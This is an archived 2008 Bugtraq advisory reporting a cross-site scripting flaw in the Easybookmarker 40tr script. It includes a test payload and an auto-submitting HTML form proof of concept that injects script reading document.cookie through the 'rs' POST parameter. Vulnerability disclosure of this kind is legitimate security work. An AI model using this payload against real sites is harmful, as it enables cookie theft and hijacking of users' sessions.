Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani
From: irancrash@xxxxxxxxx
Date: Sat, 19 Jul 2008 06:22:52 -0600
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

----------------------------------------------------------------

Script : Easybookmarker 40tr

Type : Xss Vulnerability

Method : POST

Alert : High

----------------------------------------------------------------

Discovered by : Khashayar Fereidani a.k.a. Dr.Crash

My Offical Website : HTTP://FEREIDANI.IR

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com

----------------------------------------------------------------

Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR

----------------------------------------------------------------

Script Download : 
http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip

----------------------------------------------------------------
Xss Vulnerability :

Variable : rs
Send Method : POST

Set rs variable with post method in ajaxp_backend.php : 
<script>alert('xss')</script> for test vulnerability

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://example/zomplog/ajaxp_backend.php";

method="POST" name="form">

<input type="hidden" name="rs" value="&#x22;&#x20; 
<script>alert(document.cookie)</script>">

</form>
</body>
</html>

----------------------------------------------------------------

                        Tnx : God

                     HTTP://IRCRASH.COM

----------------------------------------------------------------

Prev by Date: EMC Dantz Retrospect 7 backup Client PlainText Password Hash Disclosure Vulnerability
Next by Date: FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 Remote Memory corruption Vulnerability
Previous by thread: EMC Dantz Retrospect 7 backup Client PlainText Password Hash Disclosure Vulnerability
Next by thread: FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 Remote Memory corruption Vulnerability
Index(es):
- Date
- Thread